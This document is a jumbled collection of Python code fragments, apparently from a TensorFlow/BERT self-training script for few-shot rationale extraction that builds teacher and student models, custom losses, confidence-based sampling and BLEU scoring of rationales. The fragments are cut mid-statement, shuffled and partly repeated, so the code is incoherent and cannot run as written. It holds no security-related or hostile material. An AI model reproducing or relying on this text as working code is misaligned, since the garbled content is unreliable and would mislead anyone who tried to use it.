logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10))", "set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train and dev", "if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5]", "of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices)", "as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all self-training iterations {}\".format(max_best_acc))", "rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on", "else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info", "logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices =", "0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "if 'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import", "'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales", "#model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc", "'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc =", "best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = 
best_base_model ''' if 'mtl'", "else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001)", "np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint'", "models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#,", "in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss", "pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None,", "base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train,", "class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: 
{}\".format(X_conf.shape)) if 'mtl' in type_: #model =", "0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss =", "= None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope():", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)],", "\"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers import *", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev", "# class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_:", "logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc =", "X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch", "acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro", "tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons", "evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 +=", "run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0,", "test set (teacher 
model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set", "(\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task)", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1,", "X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred),", ": acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred,", "break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "= np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif", "= np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size]", "#run the base model n times 
with different initialization to select best base", "loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None", "out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1)", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)),", "0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "(<EMAIL>) Code for Self-training for Rationale using few-shot learning. 
This code base is", "model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {}", "y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {}", "verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc", "y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i", "logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred,", "class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student", "1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs =", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "= np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample", "of rationales on test set (student model): 
{} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales", "type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0))", "0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp =", "y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1)", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]},", "else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev", "[y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0],", "y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30,", "model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file)", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], 
verbose=0)[-2] elif 'joint_neg' in type_:", "'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "= [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on", "logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info", "in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw", "'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc =", "type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0],", "logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy =", "{} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model): {} \".format(score4/len(pred)))", "y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 =", "\"attention_mask\": 
X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\":", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]},", "temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f:", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0,", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev,", "{}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc =", "= 101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted", "'_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 
'input_ids_r':X_unlabeled['input_ids_r'][indices],", "'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]}", "if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)),", "< warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1))", "np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size", "y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info", "task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc =", "= np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:],", "'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2]", "> max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc =", "np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc =", "if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_:", "devices: {}'.format(gpus)) 
#run the base model n times with different initialization to select", "in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size:", "gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times", "'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_:", "= 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0,", "{}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in", "{}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1,", "(teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in", "acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 =", "y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss)", "model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1)", 
"tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j])", "learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096,", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs", "set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher", "end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) *", "y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if", "# model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ ==", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred):", "(\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. 
max_test_acc =", "i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch =", "max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance':", "'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'],", "(max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler =", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = 
tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])", "tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student =", "logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score", "= f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices]", "(student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model):", "of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False)", "{}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in type_: acc,", "if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file))", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights)", "= test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if", "BinaryFocalLoss, SparseCategoricalFocalLoss import random from 
sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger", "type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_:", "'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids':", "tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0))", "if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(),", "(\"Evaluating confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"])))", "choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}", "range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] =", "X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample =", "epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, 
tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "= best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for base", "\"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train =", "class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in", "np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0],", "'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task for epoch", "(\"X Unlabeled Shape: 